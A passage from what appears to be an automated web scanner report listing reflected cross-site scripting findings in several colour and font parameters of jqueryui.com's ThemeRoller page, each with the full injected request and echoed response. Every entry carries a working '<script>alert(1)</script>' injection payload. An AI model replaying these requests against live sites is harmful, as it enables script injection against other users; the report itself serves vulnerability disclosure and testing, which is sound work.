ssShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
y=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd" type="text/css" media="all" />
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c53"><script>alert(1)</script>42cd52ca697 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=F
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b577"><script>alert(1)</script>b9dabb1f883 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTex
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2eb"><script>alert(1)</script>b514358f553 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b02"><script>alert(1)</script>bc2004c518 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20da2"><script>alert(1)</script>824c2520339 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefa
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4833c"><script>alert(1)</script>da123611499 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_fl
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da82"><script>alert(1)</script>6ab60c147ab was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHig
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdcf"><script>alert(1)</script>709d73031ae was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorC
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16685"><script>alert(1)</script>dd0f9a34ef1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*/